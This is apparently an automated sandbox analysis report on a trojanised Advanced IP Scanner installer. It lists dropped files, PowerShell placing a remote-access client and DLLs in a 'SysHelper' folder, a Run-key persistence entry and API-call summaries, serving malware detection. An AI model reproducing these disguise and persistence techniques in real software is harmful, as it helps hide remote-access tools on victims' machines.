Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-56ICT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-T9A9E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	File created: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-D0PHJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-4RR0D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-CJFIB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-IE1PQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-UUCTA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-5BCDU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-3K2R2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-V7TQP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-7B70A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-15NDN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-GHBG6.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-DFL4O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-DFILP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-QAUD7.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685A7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,	7_2_685A7030
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_685950E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,	7_2_685950E0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_68595117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,	7_2_68595117
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_68595490 GetPrivateProfileIntA,	7_2_68595490

Boot Survival

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnk			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyApp			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	7_2_110251B0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	7_2_111575D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	7_2_111575D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,	7_2_11025600
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	7_2_111579D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	7_2_110238D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	7_2_110BFDD0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	7_2_11023FB0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	7_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	7_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	7_2_11110220
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	8_2_110251B0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	8_2_111575D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	8_2_111575D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,	8_2_11025600
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	8_2_111579D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	8_2_110238D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	8_2_110BFDD0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	8_2_11023FB0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	8_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	8_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	8_2_11110220

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

7_2_11029230

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
